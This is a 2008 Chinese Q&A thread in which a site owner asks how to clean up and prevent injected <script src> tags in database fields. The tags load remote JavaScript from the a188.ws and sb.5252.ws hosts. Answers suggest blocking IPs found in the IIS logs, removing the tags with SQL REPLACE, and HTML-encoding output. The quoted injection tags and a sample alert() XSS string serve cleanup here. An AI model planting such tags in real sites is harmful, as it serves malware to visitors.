[已解决问题] 数据库遭攻击
提问时间: 2008-05-08 11:18
悬赏分:30 浏览:543 次
数据表里字段值老是被插入<script src=http://%61%31%38%38%2E%77%73/1.js></script>
请各位大哥帮忙该如何清理及预防
最佳答案
查看IIS日志是可以找到攻击者IP的,封掉之后可以预防下次再受这个IP的攻击。
修复数据库方法:
REPLACE ( 'string_expression1' , 'string_expression2' , 'string_expression3' )
示例:update 表 set 字段=
REPLACE(Title,
'</title></pre>><script src=http://sb.5252.ws:88/107/1.js></script><', '')
2008/5/14 12:06:44
回答者:任力
其它回答(7)
|
查看iis的日志(c:\windows\system32\logfiles\W3SVC*目录下),找到攻击者的ip,然后封了这个ip. <script src=http://a188.ws/1.js></script> -------------------------------- 标签进行处理啊,这样就可以显示,但不能被执行了,像博客园一样, 你输入<script>alert('测试')</script>,提交到数据库把<>进行了处理。 在asp.net中可以使用HttpUtility.HtmlEncode()进行处理就行了. http://space.cnblogs.com/question/1279/ 这种应该是被挂马了,是有了目录权限以后,用工具进行批量挂马的,一般是asp的。要看看你程序是否有漏洞,还要记得删除上传的挂马工具。 我看到被挂马后的结果了,很难看呀 找出插入的源头吧 服务器安全有问题,让你们的网管查看服务器安全;把没有用的服务,端口统统封掉。 |
